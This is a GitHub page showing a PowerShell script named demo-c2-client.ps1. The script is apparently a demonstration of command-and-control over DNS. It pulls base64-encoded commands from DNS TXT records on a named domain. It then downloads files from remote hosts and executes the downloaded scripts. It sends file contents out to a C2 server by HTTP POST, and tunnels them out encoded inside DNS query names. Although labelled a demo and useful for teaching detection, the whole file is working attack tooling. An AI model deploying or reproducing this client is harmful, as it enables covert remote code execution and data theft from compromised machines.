-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathdemo-c2-client.ps1
137 lines (105 loc) · 5.03 KB
/
demo-c2-client.ps1
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
PARAM (
[string] $dnsName = "c2demo.ronnkvist.nu",
[string] $demoC2DnsServer
)
# DNS Lookup
Write-Host "Using DNS TXT-records from: $($dnsName)"
if ($demoC2DnsServer) {
Write-Host " DNS-Server: $($demoC2DnsServer)"
$dnsLookup = Resolve-DnsName $dnsName -Type TXT -Server $demoC2DnsServer
} else {
$dnsLookup = Resolve-DnsName $dnsName -Type TXT
}
Write-Host ""
Write-Host "TXT Strings Found:"
$dnsLookup.Strings | ForEach-Object {
Write-Host " $($_)"
}
# Decode TXT strings from Base64
Write-Host ""
$c2Commands = @()
Write-Host "Base64 Decoded TXT Strings:"
$dnsLookup.Strings | ForEach-Object {
$decoded = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String($_))
Write-Host " $($decoded)"
$cmd = $decoded.Split(";")
$c2Command = New-Object System.Object
$c2Command | Add-Member -MemberType NoteProperty -Name Origin -Force -Value $cmd[0]
$c2Command | Add-Member -MemberType NoteProperty -Name Number -Force -Value $cmd[1]
$c2Command | Add-Member -MemberType NoteProperty -Name Command -Force -Value $cmd[2]
$c2Command | Add-Member -MemberType NoteProperty -Name Parameter -Force -Value $cmd[3]
$c2Commands += $c2Command
}
# Sort commands by "Number"
$c2Commands = $c2Commands | Sort-Object Number
Write-Host ""
Write-Host "Commands:"
$c2Commands | Format-Table * -AutoSize
# Run commands
Write-Host ""
Write-Host "Running commands:"
$tempDir = (Get-Item ENV:Temp).Value
$c2Server = "unknown"
foreach ($c2 in $c2Commands) {
Switch ($c2.Command) {
"Write" {
Write-Host "Write: " -ForegroundColor Yellow -NoNewline
Write-Host "$($c2.Parameter)"
}
"Get" {
Write-Host "Download file from remote host: " -ForegroundColor Yellow
Write-Host " Remote: $($c2.Parameter)"
$s = $c2.Parameter.Split("/")
$OutFile = Join-Path $tempDir $s[$s.Count - 1]
Write-Host " File: $($OutFile)"
Invoke-WebRequest -Uri $c2.Parameter -OutFile $OutFile
}
"PS" {
Write-Host "Run Script: " -ForegroundColor Yellow -NoNewline
Write-Host $c2.Parameter
$scriptToRun = Join-Path $tempDir $c2.Parameter
Write-Host $scriptToRun
Write-Host "----------------------------------------------------------" -ForegroundColor Gray
& $scriptToRun
Write-Host "----------------------------------------------------------" -ForegroundColor Gray
}
"Set" {
Write-Host "Set C2 Server: " -ForegroundColor Yellow -NoNewline
Write-Host $c2.Parameter
$c2Server = $c2.Parameter
}
"http" {
Write-Host "Post information in file to Server" -ForegroundColor Yellow
Write-Host " File: $(Join-Path $tempDir $c2.Parameter)"
Write-Host " Server: http://$($c2Server)"
$fileContent = (Get-Content (Join-Path $tempDir $c2.Parameter)).Trim()
Write-Host " Content: $($fileContent)"
[string]$encodedContent = [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes($fileContent))
Write-Host " Base64: $($encodedContent)"
$webRequest = Invoke-WebRequest -Uri "http://$($c2Server)" -Method POST -Body $encodedContent
Write-Host " Status: HTTP $($webRequest.StatusCode) - $($webRequest.StatusDescription)"
}
"DNS" {
Write-Host "Upload file via DNS queries" -ForegroundColor Yellow
Write-Host " File: $(Join-Path $tempDir $c2.Parameter)"
$fileContent = (Get-Content (Join-Path $tempDir $c2.Parameter)).Trim()
Write-Host " Content: $($fileContent)"
[string]$encodedContent = [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes($fileContent))
Write-Host " Base64: $($encodedContent)"
$dnsOkContent = $encodedContent.Replace("=", "-").Replace("+", "_")
Write-Host " DNS OK: $($dnsOkContent)"
Write-Host " Query: $($dnsOkContent).$($dnsName)"
if ($demoC2DnsServer) {
Write-Host " Server: $($demoC2DnsServer)"
Resolve-DnsName "$($dnsOkContent).$($dnsName)" -Server $demoC2DnsServer -ErrorAction SilentlyContinue
} else {
Resolve-DnsName "$($dnsOkContent).$($dnsName)" -ErrorAction SilentlyContinue
}
}
default {
Write-Host "Unknown: " -ForegroundColor Red -NoNewline
Write-Host $c2.Command
}
}
Write-Host ""
}